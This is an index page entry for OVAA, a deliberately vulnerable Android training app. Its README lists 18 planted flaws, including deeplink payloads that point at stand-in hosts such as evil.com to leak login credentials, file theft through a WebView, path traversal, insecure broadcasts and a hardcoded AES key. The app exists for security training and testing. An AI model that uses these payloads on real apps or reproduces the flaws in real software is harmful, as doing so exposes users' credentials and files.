Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/oversecured/ovaa
Oversecured Vulnerable Android App
https://github.com/oversecured/ovaa
android-security appsec mobile-security vulnerable-android-apps vulnerable-application
Last synced: about 1 month ago
JSON representation
Oversecured Vulnerable Android App
- Host: GitHub
- URL: https://github.com/oversecured/ovaa
- Owner: oversecured
- License: bsd-2-clause
- Created: 2020-04-17T12:09:08.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2024-07-18T00:33:14.000Z (5 months ago)
- Last Synced: 2024-08-02T16:31:28.185Z (4 months ago)
- Topics: android-security, appsec, mobile-security, vulnerable-android-apps, vulnerable-application
- Language: Java
- Homepage: https://oversecured.com
- Size: 138 KB
- Stars: 616
- Watchers: 6
- Forks: 155
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-pentest-cheat-sheets - OVAA
- awesome-vulnerable-apps - OVAA - Oversecured Vulnerable Android App. (Mobile Security)
- Awesome-Pentest - ovaa - OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities. (Mobile Security / Vulnerable Apps)
- awesome-hacking-lists - oversecured/ovaa - Oversecured Vulnerable Android App (Java)
README
## Description
OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities.## List of vulnerabilities
This section only includes the list of vulnerabilities, without a detailed description or proof of concept. Examples from OVAA will receive detailed examination and analysis on [our blog](https://blog.oversecured.com/).1. Installation of an arbitrary `login_url` via deeplink `oversecured://ovaa/login?url=http://evil.com/`. Leads to the user's user name and password being leaked when they log in.
2. Obtaining access to arbitrary content providers (not exported, but with the attribute `android:grantUriPermissions="true"`) via deeplink `oversecured://ovaa/grant_uri_permissions`. The attacker's app needs to process `oversecured.ovaa.action.GRANT_PERMISSIONS` and pass intent to `setResult(code, intent)` with flags such as `Intent.FLAG_GRANT_READ_URI_PERMISSION` and the URI of the content provider.
3. Vulnerable host validation when processing deeplink `oversecured://ovaa/webview?url=...`.
4. Opening arbitrary URLs via deeplink `oversecured://ovaa/webview?url=http://evilexample.com`. An attacker can use the vulnerable WebView setting `WebSettings.setAllowFileAccessFromFileURLs(true)` in the `WebViewActivity.java` file to steal arbitrary files by sending them XHR requests and obtaining their content.
5. Access to arbitrary activities and acquiring access to arbitrary content providers in `LoginActivity` by supplying an arbitrary Intent object to `redirect_intent`.
6. Theft of arbitrary files in `MainActivity` by intercepting an activity launch from `Intent.ACTION_PICK` and passing the URI to any file as data.
7. Insecure broadcast to `MainActivity` containing credentials. The attacker can register a broadcast receiver with action `oversecured.ovaa.action.UNPROTECTED_CREDENTIALS_DATA` and obtain the user's data.
8. Insecure activity launch in `MainActivity` with action `oversecured.ovaa.action.WEBVIEW`, containing the user's encrypted data in the query parameter `token`.
9. Deletion of arbitrary files via the insecure `DeleteFilesSerializable` deserialization object.
10. Memory corruption via the `MemoryCorruptionParcelable` object.
11. Memory corruption via the `MemoryCorruptionSerializable` object.
12. Obtaining read/write access to arbitrary files in `TheftOverwriteProvider` via path-traversal in the value `uri.getLastPathSegment()`.
13. Obtaining access to app logs via `InsecureLoggerService`. Leak of credentials in `LoginActivity` `Log.d("ovaa", "Processing " + loginData)`.
14. Use of the hardcoded AES key in `WeakCrypto`.
15. Arbitrary Code Execution in `OversecuredApplication` by launching code from third-party apps with no security checks.
16. Use of very wide file sharing declaration for `oversecured.ovaa.fileprovider` content provider in `root` entry.
17. Hardcoded credentials to a dev environment endpoint in `strings.xml` in `test_url` entry.
18. Arbitrary code execution via a DEX library located in a world-readable/writable directory.---------------------------------------
*Licensed under the Simplified BSD License**Copyright (c) 2020, Oversecured Inc*
https://oversecured.com/